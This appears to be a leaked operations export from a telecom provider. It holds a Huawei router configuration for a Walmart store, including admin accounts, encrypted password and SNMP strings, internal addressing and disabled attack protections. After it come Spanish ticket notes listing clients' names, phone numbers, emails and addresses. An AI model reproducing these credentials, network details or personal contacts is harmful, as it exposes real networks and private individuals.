APR 24 2022 05:13:15+00:00 CC_WALMART_CR_TIENDA_3128 %%01GTL/4/STATECHANGED(L)[83]:LICENSE STATE CHANGED FROM NULL TO DEFAULT.
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP CLOCK
2022-06-20 18:26:10
MONDAY
TIME ZONE(GMT) : UTC-06:00
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP SN
EQUIPMENT SN(ESN): 21500103042SJ3601605
LICENSE ESN: 21500103042SJ3601605
SLOT  SUB TYPE             SN                       P/N
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0     --  AR129CGVW-L      21500103042SJ3601605     50010304
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP CUR
[V200R008C20SPC800]
#
 SYSNAME CC_WALMART_CR_TIENDA_3128
#
SSL RENEGOTIATION-RATE 1
#
 DROP ILLEGAL-MAC ALARM
#
 CLOCK TIMEZONE GMT MINUS 06:00:00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UNDO ANTI-ATTACK ABNORMAL ENABLE
UNDO ANTI-ATTACK FRAGMENT ENABLE
UNDO ANTI-ATTACK ICMP-FLOOD ENABLE
UNDO ANTI-ATTACK TCP-SYN ENABLE
UNDO ANTI-ATTACK UDP-FLOOD ENABLE
#
DHCP ENABLE
#
RADIUS-SERVER TEMPLATE DEFAULT
#
PKI REALM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4.120 0.0.0.3
 RULE 2 PERMIT SOURCE 172.18.40.0 0.0.0.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YR)UNYG$DWU{1@#TD#&amp;CZ"*#L),1~EY)X$UN/PWQZI|$J\_ZS'2$_8Q;6.;%^%#
 LOCAL-USER ADMIN PRIVILEGE LEVEL 15
 LOCAL-USER ADMIN SERVICE-TYPE TERMINAL HTTP
 LOCAL-USER CLAROCR PASSWORD IRREVERSIBLE-CIPHER %^%#J0KNI%UXX/\B!C/ZR%"NUET@S7YLSQ*QPMLE_MLLHAPI'9(LD9RIHX9FR'S*%^%#
 LOCAL-USER CLAROCR PRIVILEGE LEVEL 15
 LOCAL-USER CLAROCR SERVICE-TYPE TELNET TERMINAL SSH FTP HTTP
#
WEB
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
 PRIORITY 16
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CLIENTE
#
INTERFACE ETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/0
 UNDO PORTSWITCH
 DESCRIPTION ENLACE DATOS
 UNDO ICMP HOST-UNREACHABLE SEND
 UNDO ICMP PORT-UNREACHABLE SEND
 UNDO ICMP TTL-EXCEEDED SEND
 IP ADDRESS DHCP-ALLOC
#
INTERFACE GIGABITETHERNET0/0/0.1115
 DESCRIPTION WAN PRINCIPAL/_/CONTR0001514812OC/_/
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 3
 DOT1Q TERMINATION VID 1115
 IP ADDRESS 10.201.12.138 255.255.255.224
#
INTERFACE GIGABITETHERNET0/0/0.2115
 DESCRIPTION REDUNDANCY LINK TO MTR488
 DOT1Q TERMINATION VID 2115
 IP ADDRESS 10.201.42.106 255.255.255.224
#
INTERFACE GIGABITETHERNET0/0/1
 UNDO PORTSWITCH
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.32.4.121 255.255.255.252
 OSPF NETWORK-TYPE P2P
 OSPF TIMER DEAD 60
#
INTERFACE GIGABITETHERNET0/0/2
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/3
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION LIBRE
 SHUTDOWN
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
 SHUTDOWN
 IP ADDRESS DHCP-ALLOC
#
INTERFACE CELLULAR0/0/0
#
INTERFACE CELLULAR0/0/1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.99.77.67 255.255.255.255
#
BGP 64521
 ROUTER-ID 10.99.77.67
 PEER 10.201.12.129 AS-NUMBER 14754
 PEER 10.201.42.97 AS-NUMBER 14754
 #
 IPV4-FAMILY UNICAST
  UNDO SYNCHRONIZATION
  NETWORK 10.99.77.67 255.255.255.255
  IMPORT-ROUTE OSPF 65410
  PEER 10.201.12.129 ENABLE
  PEER 10.201.12.129 ROUTE-POLICY LOCAL_PREFERENCE IMPORT
  PEER 10.201.12.129 ROUTE-POLICY LOCAL_PREFERENCE EXPORT
  PEER 10.201.12.129 NEXT-HOP-LOCAL
  PEER 10.201.42.97 ENABLE
  PEER 10.201.42.97 NEXT-HOP-LOCAL
#
OSPF 65410
 DEFAULT-ROUTE-ADVERTISE
 IMPORT-ROUTE DIRECT
 IMPORT-ROUTE OSPF 450
 AREA 0.0.0.0
  NETWORK 22.32.4.120 0.0.0.3
#
ROUTE-POLICY OSPF_DATOS_WALMART PERMIT NODE 10
 IF-MATCH ACL 2999
#
ROUTE-POLICY LOCAL_PREFERENCE PERMIT NODE 10
 APPLY LOCAL-PREFERENCE 200
#
CPU-DEFEND POLICY ICMP
 PACKET-TYPE ICMP RATE-LIMIT 1200
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0360DEF3292FF1
 SNMP-AGENT COMMUNITY READ %^%#FRUXRR\Z]BIXDKSIZXI.A$'OE%|/2BGA*G!CV;V,OX5]'NS]Y9VZWN!O|=%.X!%C~3({1SWHASD(D})'%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION DEL BANCO NACIONAL 400 MTS AL NORTE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NTP-SERVICE UNICAST-PEER 10.201.42.97
 NTP-SERVICE UNICAST-SERVER 10.201.12.129 PREFERENCE
#
VOICE
 #
 DIAGNOSE
#
OPS
#
AUTOSTART
#
RETURN</t>
  </si>
  <si>
    <t>SE HABLÓ CON STEVEN MÁRQUEZ/CLIENTE 2243-7253 INDICA QUE REALIZARÁ SUS PRUEBAS, DE PERSISTIR LO REPORTADO, SE LE PIDE QUE ENVÍE PRUEBAS POR CORREO, SIGUIENDO LA SECUENCIA DEL MISMO.</t>
  </si>
  <si>
    <t>F4609036</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM ESCOBAR 58223754 MENCIONA QUE DARIO FIGUEROA ESTARA EN PR ESPERANDO A PR
CLIENTE SOLICITA SE BRINDE RETRO SI ES QUE SE TIENE UN CORTE O EL DIAGNOSTICO QUE BRINDE PERSONAL TECNICO
-ID 1001269120</t>
  </si>
  <si>
    <t>CLIENTE AFECTADO POR CORTE DE FO EN SECTOR POR SABOTAJE; ADICIONAL SE LLAMÓ/HABLÓ CON WILLIAM ESCOBAR/CLIENTE 58223754 Y SE LE BRINDAN AVANCES DE LA FALLA.</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS
DE: WILLIAM ORLANDO ESCOBAR PEREZ &lt;WILLIAM.ESCOBAR@PANTALEON.COM&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 15:46
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SIN SERVICIO ||548300001T || . PANTALEON S.A. || KM.86.5 CARR A SANTA LUCIA COTZUMALGUAPA ESCUINTLA
LISTO FAVOR REALIZAR LA VISITA
SALUDOS
*-*-*-*</t>
  </si>
  <si>
    <t>F4609048</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE MANUEL 32840415 MENCIONA QUE ESTAN EN PR HASTA LAS 5  Y SI ES NECESARIO LLEGAR A PR SERIA MAÑANA A PARTIR DE LAS 8:00
-ID 1001298060</t>
  </si>
  <si>
    <t>F4609081</t>
  </si>
  <si>
    <t xml:space="preserve">
SE ENVIA MAIL AL CLIENTE NOTIFICANDO LA ALARMA
DE: BARBARA ISABEL APARICIO MORALES &lt;BARBARA.APARICIO@CLARO.COM.GT&gt;ENVIADO: LUNES, 20 DE JUNIO DE 2022 14:5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655
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM165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09081
ID: 47501571T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1655
UBICADO EN: 2 CALLE 2-55 "B" ZONA 1, FRAIJANES
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4609089</t>
  </si>
  <si>
    <t>F4609111</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MANUEL ORTIZ, QUIEN SOLICITA UNA CERTIFICACION. CLIENTE INDICA QUE TIENE QUE PROGRAMAR LA FECHA POR LO QUE ESTARA LLAMANDO AL CC DE EL SALVADOR Y ELLOS SE ESTARAN COMUNICANDO CON NOSOTROS PARA LA PROGRAMACION.
1001258707
COLA:
NOMBRE: A: 0050325269089
NÚMERO: 0050325269089
DURACIÓN: 0:00:16
ESTADO: CONECTADA
DETALLES: 0050325269089
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 15:25:08</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE MANUEL ORTIZ QUIEN INDICA QUE YA NO SE ENCUENTRA EN LAS INSTALACIONES PERO QUE NECESITA REALIZAR PRUEBAS.
SOLICITA QUE SE LE LLAME MAÑANA A LAS 10:00AM
1001727641
COLA:
NOMBRE: A: 0050378601361
NÚMERO: 0050378601361
DURACIÓN: 0:00:25
ESTADO: CONECTADA
DETALLES: 0050378601361
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 22/06/2022 16:30:43</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MANUEL ORTIZ 25269089 RESPONDE SEÑORITA(NO BRINDA NOMBRE) MENCIONA QUE  MANUEL ORTIZ NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA A LAS 15:00 HRS
-ID 1001868655</t>
  </si>
  <si>
    <t>F4609124</t>
  </si>
  <si>
    <t>SE ESCALÓ CON ERICKA GONZÁLEZ/EJECUTIVA CLARO 58269282 INDICA QUE YA ESTÁ VIENDO ESTE ESCENARIO, SE LE REENVÍA CORREO, EN ESPERA DE AVANCES:
ASUNTO: RE: 758500328T | MINISTERIO PUBLICO</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A ÁREA COMERCIAL INDICÁNDOLE QUE ESTAMOS A LA ESPERA DE LOS COMENTARIOS DE CLIENTE FINAL PARA SEGUIMIENTO DEL TICKET.
ASUNTO: RE: 758500328T | MINISTERIO PUBLICO</t>
  </si>
  <si>
    <t>ROBERTO FUENTES AL NUMERO 42181770 INFORMA QUE SON VARIOS PUNTOS LOS CUALES SE PRESENTAN INESTABILIDAD POR LA TECNOLOGIA 3G, SOLICITA QUE SE PUEDE MIGRAR LOS ENLACES A FIBRA OPTIVA, SE LE INFORMA QUE ESTA SOLICITUD LA TIENE QUE REALIZAR POR MEDIO DE SU EJECUTIVO DE CUENTA.</t>
  </si>
  <si>
    <t>F4609126</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DANIEL GARCIA 45836146 MENCIONA QUE LOS EQUIPOS ESTAN APAGADOS POR UNA ORDEN DE TRASLADO
CLIENTE CONFIRMA QUE EL SEGUIMIENTO LO ESTAN DANDO CON SU EJECUTIVO
-ID 1001276504</t>
  </si>
  <si>
    <t>F4609134</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MONTANO AL 23473354 CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 1001368828
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MONTANO AL 23473354 NO RESPONDE SE INTENTARA LUEGO **
-ID 1001328782
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MONTANO AL 23473354 NO RESPONDE || SE INTENTARA LUEGO **
-ID 1001350336
**</t>
  </si>
  <si>
    <t>F4609137</t>
  </si>
  <si>
    <t>INFORMA CLIENTE LEONEL GOMEZ 59223564 QUE TIENE ESCALADO EL CASO CON EL PROVEEDOR DE LA PBX YA QUE SE DAÑÓ SU EQUIPO. CLIENTE AUTORIZA EL CIERRE DEL TICKET YA QUE NO TIENE FECHA ESTIMADA DE REPARACIÓN. ID: 1001393175</t>
  </si>
  <si>
    <t>F4609156</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARWIN GARCIA 78441687 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001516057</t>
  </si>
  <si>
    <t>F4609157</t>
  </si>
  <si>
    <t>DANY DE CC HN CONFIRMAQ UE SE PROCEDA CON EL CIERRE DE LA FALLA ## SE ADJUNTA CORRES CON EL QUE CLIENTE INDICA QUE CADA VEZ QUE LE SUCEDE INCOVNENIENTES EL REINICIA EL EQUIPO Y SERVICIO RESTABLECE-
CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
BUENAS TARDES ESTIMADOS;
UN GUSTO SALUDARLES, PRIMERAMENTE AGRADECEMOS LA INFORMACIÓN BRINDADA Y SOLICITAMOS QUE EN FUTURAS OCASIONES POR FAVOR SE NOS FACILITE UN NÚMERO DE CONTACTO EN PUNTO REMOTO PARA REALIZAR PRUEBAS DE PRIMER NIVEL. AL IGUAL MENCIONARLES QUE PUEDEN COMUNICARSE AL *847 OPCIÓN 1 OPCIÓN 1 O A LOS NÚMEROS 22054847 Y 22024847.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS EN BASE AL ESTADO EN EL QUE OBSERVAN EL ENLACE ASÍ MISMO EL PROCEDER CON EL TICKET.
SALUDOS CORDIALES Y ÉXITOS EN SUS LABORES.
NOTIFICAMOS QUE EN HORARIO DE LUNES A VIERNES DE 8 PM A 7 AM Y LOS DÍAS SÁBADOS Y DOMINGOS DE 05:30 PM A 08:00 AM LAS SOLICITUDES DEBEN REALIZARSE VÍA CORREO A CLIENTESCORPORATIVOS@CLARO.COM.GT, TAMBIÉN VÍA LLAMADA AL *847 EN LA OPCIÓN 1 OPCIÓN 1.
DESCRIPCIÓN: DESCRIPCIÓN: DESCRIPCIÓN: DESCRIPCIÓN: DESCRIPCIÓN: CID:IMAGE001.PNG@01CE9373.99853890
   KENDY ALVAREZ TOMAS.
   VIP NIVEL 2- DATOS
   SERCOM DE HONDURAS, S.A. DE C.V. EDIFICIO CLARO COLONIA SAN CARLOS.
    KENDY.ALVAREZ@CLARO.COM.HN
[BORRADOR]
GUARDADO: MAR 21/06/2022 14:42
SALUDOS, ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯` ¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37; MARÍA ISABEL GODÍNEZ SÁENZ ACCESOS EMPRESARIALES C.A. GESTOR DE CLIENTES CORPORATIVOS NOC N1 MARIAI.GODINEZ@CLARO.COM.GT +(502)2224-5388
JAVIER AGUILAR CASTRO &lt;JAGUILARC@BACCREDOMATIC.CR&gt;
BUENOS DÍAS,
DE NUESTRO LADO, CUANDO SE DA EL ERROR, PROCEDEMOS CON APAGAR EL PUERTO DESDE EL SISTEMA Y LUEGO LO VOLVEMOS A ENCENDER, ESO NOS A RESULTADO LAS VECES QUE NOS DA EL INCONVENIENTE.
CREEMOS QUE ES IMPORTANTE REALIZAR LAS VALIDACIONES PERO CUANDO EL E1 PRESENTA EL ERROR, POR LO CUAL LES SOLICITAMOS DE SU AYUDA EN TENER UN CANAL DE CONTACTO MAS DIRECTO, Y NO POR ESTE MEDIO, PUEDE SER UN NUMERO TELEFONICO Y ASI HACER VALIDACIONES CONJUNTAMENTE CUANDO SE PRESENTA EL PROBLEMA, Y VER SI LLEGAMOS A LA CAUSA RAIZ.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
JAVIER AGUILAR C.
SHARED SERVICE CENTER REGIONAL
EXT. 50180
BAC | CREDOMATIC</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE. INDICANDOLE QUE EL PROBLEMA ES DE ELLOS Y NO DE CLARO- ### SE ENVIAN TAMBIEN PRUEBAS##
MARIA ISABEL GODINEZ SAENZ
BUEN DÍA ESTIMADOS, EL SERVICIO AL MOMENTO DE DIAGNOSTICAR POR PARTE DE CLARO LO ENCONTRAMOS SIN INCONVENIENTES, PERO NOS PERCATAMOS DE QUE EN EL PUERTO DONDE SE CONECTA LA PLANTA TELEFÓNICA, ÚNICAMENTE ESTABA CONECTADO A NIVEL DE CAPA 1 (FÍSICAMENTE) Y NO A NIVEL DE CAPA 2 (LÓGICAMENTE), POR LO QUE A MANERA DE APOYO RÁPIDO Y QUE USTEDES NO REINICIARAN LA PLANTA TELEFÓNICA DEBIDO A LA URGENCIA QUE PRESENTABAN, SE APLICÓ REINICIO A NUESTRO DISPOSITIVO. YA CON ESTO, OBSERVAMOS QUE LA PLANTA TELEFÓNICA SE CONECTÓ A NOSOTROS A NIVEL DE CAPA 1 Y 2.
POR LO QUE EN RESUMEN, EL E1 ESTA PERDIENDO SEÑAL DE  SINCRONIA POR PARTE DE SU PBX
ADJUNTO PRUEBAS DONDE UBICAMOS QUE PBX NO ESTABA CONECTÁNDOSE A NIVEL LÓGICO HACIA NOSOTROS:
/_/DID_CREDOMATIC_DE_HONDURAS_861074_TEG54\ISDN\ISDN-PRI1&gt;&gt;SHOW STATUS -S
STATUS OF ISDN-PRI1 INTERFACE
LAYER 1 STATUS   : UP ----------------ACA FISICAMENTE SI ESTA CONECTADA
LAYER 1 UP TIME  : 0H 07M 10S
LAYER 2 STATUS   : DOWN-------------LOGICAMENTE PBX NO ESTA CONECTADA
B CHANNELS IN USE: NONE
COMMAND EXECUTED
/_/DID_CREDOMATIC_DE_HONDURAS_861074_TEG54\ISDN\ISDN-PRI1&gt;&gt;
CON REFERENTE A LAS CORRECCIONES QUE USTEDES REALIZARON (SEGÚN CORREO ADJUNTO ), OBSERVAMOS EN NUESTRO CONTADOR QUE HA DISMINUIDO EXPONENCIALMENTE LOS ERRORES PROVENIENTES DE LA PBX:
/_/DID_CREDOMATIC_DE_HONDURAS_861074_TEG54\PRI1&gt;&gt;SHOW STATISTICS
STATISTICS OF PRI1 INTERFACE
-------------RX----------TX----------
LOS  ALARMS: 0
LOF  ALARMS: 1--------------------- ERROR NO INCREMENTA
AIS  ALARMS: 0           0 -------------NO SE OBSERVA ERROR
RAI  ALARMS: 1           1--------------ERROR NO INCREMENTA
BER  ALARMS: 0
CODE ERRORS: 0
FAS  ERRORS: 0
CRC  ERRORS: 0 -------------------------- ERRORES DE CRC A 0
FEBE ALARMS: 0
BER(LOCAL) : 0.00E+00
BER(REMOTE): 0.00E+00
COMMAND EXECUTED
/_/DID_CREDOMATIC_DE_HONDURAS_861074_TEG54\PRI1&gt;&gt;
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE. EN ESPERA DE SUS COMENTARIO. A NIVEL DE CLARO TODO OK
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: LUNES, 20 DE JUNIO DE 2022 17:00
PARA: CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; JAVIER AGUILAR CASTRO &lt;JAGUILARC@BACCREDOMATIC.CR&gt;; CARLOS EDUARDO CERRATO NUNEZ &lt;CARLOS.CERRATO@BACCREDOMATIC.HN&gt;; CRISTOPHER ROJAS ALFARO &lt;CROJASA@BACCREDOMATIC.CR&gt;; DENIIS AGUILAR RODRIGUEZ &lt;DAGUILARRO@BACCREDOMATIC.COM&gt;; MONICA YIREH CASTILLO POON &lt;MONICA.CASTILLO@CLARO.COM.GT&gt;; DANILO ALBERTO PUERTO ROSALES &lt;DANILO.PUERTO@BACCREDOMATIC.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MARCELA LARISSA ALVARADO HERRERA &lt;MLALVARADOH@BACCREDOMATIC.HN&gt;; ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
CC: ESTEPHANY PAOLA CORTEZ SALGADO &lt;ESTEPHANY.CORTEZ@BACCREDOMATIC.HN&gt;; JORGE ALBERTO DAVID ZUNIGA &lt;JDAVID@BACCREDOMATIC.HN&gt;; ELMER OTTONIEL OCHOA PINEDA &lt;OOCHOA@BACCREDOMATIC.HN&gt;; G-SSC VENTAS HON &lt;G-SSCVENTASHON@BACCREDOMATIC.COM&gt;; JOSE ESTEBAN URGELLÉS VENTURA &lt;JOSE.URGELLES@BACCREDOMATIC.COM&gt;; JEAN CARLO SALAS SALAS &lt;JSALASSA@BACCREDOMATIC.COM&gt;; SAQITZ¿UNUN ULIL COJTI LOPEZ &lt;SAQITZUNUN.COJTI@CLARO.COM.GT&gt;; LUIS DAVID ZELAYA MONCADA &lt;LUIS.ZELAYA@BACCREDOMATIC.HN&gt;; JOSUE ADAN AGUILAR MORALES &lt;ADAN.AGUILAR@BACCREDOMATIC.HN&gt;; NAYELYN RAMIREZ VEGA &lt;NAYELYN.RAMIREZ@ASESOREXTERNOCA.COM&gt;; VALERY GABRIELA SEAMAN SHERAN &lt;VSEAMAN@BACCREDOMATIC.HN&gt;; G-TELEMATICA-HON-COM &lt;TELEMATICA@BACCREDOMATIC.HN&gt;; JOSE LUIS RODRIGUEZ PADILLA &lt;JLRODRIGUEZ@BACCREDOMATIC.HN&gt;; CARLOS RECINOS LEMUES &lt;CRECINOSL@BACCREDOMATIC.CR&gt;; DAVID LEONEL AMADOR MARADIAGA &lt;DAVID.AMADOR@BACCREDOMATIC.HN&gt;; ANNA KARINA DURON ESPINAL &lt;ADURON@BACCREDOMATIC.HN&gt;; JOSE ANTONIO MARADIAGA MARADIAGA &lt;JMARADIAGA@BACCREDOMATIC.HN&gt;
ASUNTO: RE: SD1129596// NUMERO PILOTO: 2283-4210// BULEVAR MORAZAN,EDIFICIO INTERAMERICANA,3ER PISO
BUENA TARDE ESTIMADOS, FAVOR SU APOYO REALIZANDO PRUEBAS Y CONFIRMANDO SI YA POSEEN LLAMADAS ENTRANTES Y SALIENTES.
QUEDAMOS AL TANTO DE SUS COMENTARIOS,
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>F4609172</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JORGE DEL CID. PERO ENVIA A BUZON.
1001265214
COLA:
NOMBRE: A: 0050499371570
NÚMERO: 0050499371570
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050499371570
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 15:45:44</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JORGE A. DELCID AL 0050499371570 INDICA QUE VE DESCONECTADO UN EQUIPO AUN SE LE INDICA QUE SE LE ENVIO CORREO CON PRUEBAS, INFORMA QUE REALIZARA PRUEBAS Y QUE SE LE DEVUELVA LA LLAMADA || SE NOTIFICA A GESTOR **
-ID 1001274170   -  1001274542
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLINTE JORGE A. DELCID 99371570 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001294333</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE CON LA PRUEBA DE LA LLAMADA
BUENAS TARDES,
ESTIMADOS SE REVISO EL SERVICIO Y SE ENCUENTRA ACTIVO.
SE OBSERVA TRAFICO.
ADJUNTO PRUEBA DE LLAMADA.</t>
  </si>
  <si>
    <t>F4609186</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AGENTE CAMPOS 26652920 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001297072</t>
  </si>
  <si>
    <t>F4609199</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE WILMER MURILLO PERO DA TONO DE OCUPADO.
SE VA A SOLICITAR APOYO A CC. VIA SKYPE.
1001271717
COLA:
NOMBRE: A: 0050425662020
NÚMERO: 0050425662020
DURACIÓN: 0:00:15
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050425662020
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 16:06:31</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMER MURILLO AL 0050433792432 NO RESPONDE | ENVIA A BUZON, SE INTENTARA LUEGO**
-ID 1001329002
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILMER MURILLO AL 0050433792432 Y BRINDA LOS SIGUIENTES DATOS  **
HORARIO DE ATENCION: 10:30 AM A 17:00 HRS
GESTION DE PERMISOS: SE NECESITAN PERSMISOS ENVIAR CORREO  CON EL LISTADO DEL PERSONAL TEC AL CORREO WILMERM@BANPAIS.HN
DIRECCION: EDIFICIO BANPAIS RESIDENCIALES PEDREGAL FRENTE A FUNADEH  500 MTS AL NORTE DEL  HOSPITAL MARIO CATALINO RIVAS
ATENDERA EN SITIO:JORGE GONZALEZ.
-ID 1001347189
**</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE WILMER MURILLO PERO ENVIA A BUZON.
1001304774
COLA:
NOMBRE: A: 0050433792432
NÚMERO: 0050433792432
DURACIÓN: 0:00:21
ESTADO: CONECTADA
DETALLES: 0050433792432
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 18:28:38</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  WILMER MURILLO 33792432 PERO NO RESPONDE
-ID 1001298871</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE WILMER MURILLO PERO NO CONTESTA.
1001274161, 1001274337.
COLA:
NOMBRE: A: 0050433792432
NÚMERO: 0050433792432
DURACIÓN: 0:00:16
ESTADO: MARCANDO
DETALLES: 0050433792432
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/06/2022 16:14:20</t>
  </si>
  <si>
    <t>F4609200</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUSTO OROZCO 51259264 MENCIONA QUE YA NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMADA A LAS 8:00 HRS
-ID 1001283702</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN VASQUEZ - 51201795 MENCIONA QUE OBSERVAN INESTABILIDAD SE LE MENCIONA QUE A NIVEL DE CLARO TODO ESTA FUNCIONANDO BIEN, CLIENTE SOLICITA LAS PRUEBAS POR CORREO
HF_AGS_SANMIGUELIXTAHUACAN@MP.GOB.GT -  NOCSE@MP.GOB.GT
-ID 1001332574</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 21 DE JUNIO DE 2022 8:25
PARA: NOC SE MINISTERIO PUBLICO &lt;NOCSE@MP.GOB.GT&gt;; HF_AGS_SANMIGUELIXTAHUACAN@MP.GOB.GT &lt;HF_AGS_SANMIGUELIXTAHUACAN@MP.GOB.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: MINISTERIO PUBLICO || AGENCIA FISCAL SAN MIGUEL IXTAHUACÁN || 758500298T
BUEN DÍA
    ESTIMADO CLIENTE DANDO SEGUIMIENTO AL CASO, SOLICITAMOS DE SU APOYO VALIDANDO COMO OBSERVA EL SERVICIO ACTUALMENTE, YA QUE EL MISMO SE ENCUENTRA OPERATIVO Y ESTABLE.
QUEDAMOS ATENTOS A SUS COMENTARIOS.
CUALQUIER CONSULTA, A LA ORDEN.
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUSTO OROZCO 51259264 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE BRINDA CONTACTO  KEVIN VASQUEZ - 51201795
-ID 1001331904</t>
  </si>
  <si>
    <t>F4609202</t>
  </si>
  <si>
    <t>##SE LAMA A ALCIENTE MARGARITA LEIVA.-79191805 NO CONTESTA##ENVIA A BUZON 3 VECES##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE VIELMAN-79191742 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001342902</t>
  </si>
  <si>
